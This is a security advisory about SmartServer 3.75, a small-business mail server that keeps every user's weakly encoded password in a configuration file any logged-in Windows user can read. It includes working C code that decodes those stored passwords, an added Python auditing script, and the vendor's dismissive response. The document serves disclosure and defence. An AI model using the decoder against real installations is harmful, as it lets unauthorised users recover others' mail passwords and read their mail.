COMMAND
SmartServer
SYSTEMS AFFECTED
SmartServer 3.75 (others?)
PROBLEM
Steven Alexander found the following. SmartServer3 (SS3) is a small
business email server from NetCPlus. It installs by default in
C:\Program Files\smartserver3\ . In this folder it stores a
configuration file called 'dialsrv.ini'. This file is accessible
to all authenticated users (authenticated to Windows) and contains
entries for every user, which include their weakly encrypted
password. An entry for a user 'Carl' might look like this:
[USER1]
realname=Carl Jones
id=Carl
dir=CARL
pw=~:kC@nD3~:
extml=0
alertport=
alert=
UserActive=1
MailLimit=0
MailMAxWarn=0
MailMaxSize=20
The password encryption scheme is weak. The encryption of the
password depends only on the password entered and on the first
letter of the POP userID, which is given in the entry "dir=CARL".
The attached source is the final copy of the code that was used
while dismantling the password scheme. It can decrypt a password
of up to 8 characters in length (for shorter passwords, ignore the
extra characters). If you need to decrypt a password longer than
8 characters, run the program twice and enter the characters after
the 8th as a new series (9 would be 1, 10 would be 2, etc). Don't
forget to enter the first letter of the username into the program
as well.
Though it has some other strange properties, the scheme works by
adding a position-specific value to each character of the
password. Any character that is the same as the first character
of the username has a default encryption. For instance, the user
BOB with the password 'Book' will have the same encrypted
character for the first letter of his password as the user CARL
with the password 'Catfish'. Look at the code for more details.
A legitimate administrator can see any user's password after
logging into the SS3 console by editing a user and unchecking
the 'hide password' box.
#include <stdio.h>

#define DIGIT   0
#define UPPER   1
#define LOWER   2
#define DEFAULT 3

int main(void) {
    /* Per-position base values for each character class. Row DEFAULT
       holds the byte that stands for "same as the username's initial". */
    unsigned char start_table[4][8] = {
        { 0x30, 0x4a, 0x7b, 0x53, 0x50, 0x7e, 0x54, 0x43 },
        { 0x41, 0x5b, 0x2e, 0x64, 0x61, 0x31, 0x65, 0x54 },
        { 0x60, 0x7a, 0x4d, 0x25, 0x22, 0x50, 0x26, 0x73 },
        { 0x7e, 0x3a, 0x6b, 0x43, 0x40, 0x6e, 0x44, 0x33 } };
    unsigned char uname = 0x46; /* Just the first character from the DIR= entry */
    unsigned char hash[8] = { 'E', '1', 'U', '0', 't', 'b', '*', '&' }; /* the pw= bytes */
    unsigned char pass[8];
    unsigned char i;
    unsigned char range;

    /* A username whose initial is a digit ('0'..'9') shifts every stored byte by one */
    if (uname >= 0x30 && uname <= 0x39) {
        for (i = 0; i <= 7; i++) {
            hash[i] += 1;
        }
    }

    for (i = 0; i < 8; i++) {
        /* The DEFAULT byte means "this character equals the username's initial" */
        if (hash[i] == start_table[DEFAULT][i]) {
            pass[i] = uname;
            continue;
        }
        range = LOWER; /* hash values wrap to 0x21 after 0x7e */
        if (hash[i] >= start_table[DIGIT][i] && hash[i] <= (start_table[DIGIT][i] + 0x0a))
            range = DIGIT;
        if (hash[i] >= start_table[UPPER][i] && hash[i] <= (start_table[UPPER][i] + 0x1a))
            range = UPPER;
        if (hash[i] >= start_table[LOWER][i] && hash[i] <= (start_table[LOWER][i] + 0x1a))
            range = LOWER;

        if (range == DIGIT) {
            /* digit ranges at positions 2 and 5 cross 0x7e: undo the wrap to 0x21 */
            if (i == 2 || i == 5) {
                if (hash[i] < 0x73) {
                    hash[i] = hash[i] + 0x5e;
                }
            }
            pass[i] = (hash[i] - start_table[DIGIT][i]) + 0x30;
        }
        if (range == UPPER) {
            pass[i] = (hash[i] - start_table[UPPER][i]) + 0x41;
            /* the initial itself is encoded as DEFAULT, so letters past it sit one lower */
            if (pass[i] >= uname)
                pass[i] += 1;
        }
        if (range == LOWER) {
            /* lower-case ranges at positions 1 and 7 cross 0x7e: undo the wrap to 0x21 */
            if (i == 1 || i == 7) {
                if (hash[i] < 0x73) {
                    hash[i] = hash[i] + 0x5e;
                }
            }
            pass[i] = (hash[i] - start_table[LOWER][i]) + 0x61;
        }
    }

    printf("The password is:\n\t");
    for (i = 0; i < 8; i++) {
        printf("%c ", pass[i]);
    }
    printf("\n");
    return 0;
}
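As an added, defender-side example (not part of the original advisory or the vendor's code), the following Python audits a dialsrv.ini in the [USERn] layout shown above without decoding anything. It relies on two consequences of the scheme described above: since each password character becomes one stored byte, the pw= length equals the password length, and since the encoding depends only on the password and the first letter of dir=, two users sharing that initial and the same pw= string share a password. The function names and the INI text (including the pw= strings) are constructed for this example.

```python
import re
from collections import defaultdict

# Constructed sample in the [USERn] layout from the advisory; the pw= strings are made up.
SAMPLE_INI = """\
[USER2]
dir=DANA
pw=E1U0tb*&
UserActive=1
[USER3]
dir=DAVE
pw=E1U0tb*&
UserActive=1
[USER4]
dir=BOB
pw=Q#x
UserActive=0
"""

SECTION = re.compile(r"^\[(USER\d+)\]$")

def parse_users(text):
    # Returns {section: {key: value}} for every [USERn] section in the INI text.
    users, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = SECTION.match(line)
        if m:
            current = users.setdefault(m.group(1), {})
        elif current is not None and "=" in line:
            key, _, value = line.partition("=")
            current[key.strip()] = value.strip()
    return users

def audit(users, min_len=8):
    # Findings read off the stored pw= strings alone; nothing is decoded.
    findings, by_cipher = [], defaultdict(list)
    for sect, u in users.items():
        pw, initial = u.get("pw", ""), u.get("dir", "")[:1].upper()
        if len(pw) < min_len:  # one stored byte per password character, so length leaks
            findings.append((sect, "short password (%d chars)" % len(pw)))
        if u.get("UserActive") == "0" and pw:
            findings.append((sect, "inactive account still stores a password"))
        by_cipher[(initial, pw)].append(sect)  # same initial and same pw= means same password
    for (initial, _), sects in by_cipher.items():
        if len(sects) > 1:
            findings.append((",".join(sorted(sects)), "identical password under initial %r" % initial))
    return findings

def run_sample():
    return audit(parse_users(SAMPLE_INI))
```

Point `parse_users` at the real file contents instead of SAMPLE_INI to audit an installation; the reuse check is only meaningful across users whose dir= entries start with the same letter, which is why the grouping key includes the initial.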
SOLUTION
The vendor was contacted about this problem a couple of weeks
ago; they responded with insults and implied threats. They
maintain that good encryption is not necessary for the
environments in which their product is used. Further, they insist
that they pitch their product for use in businesses and that the
email contained in a business user's mail box is only of interest
to that person--Yes, they really did say that.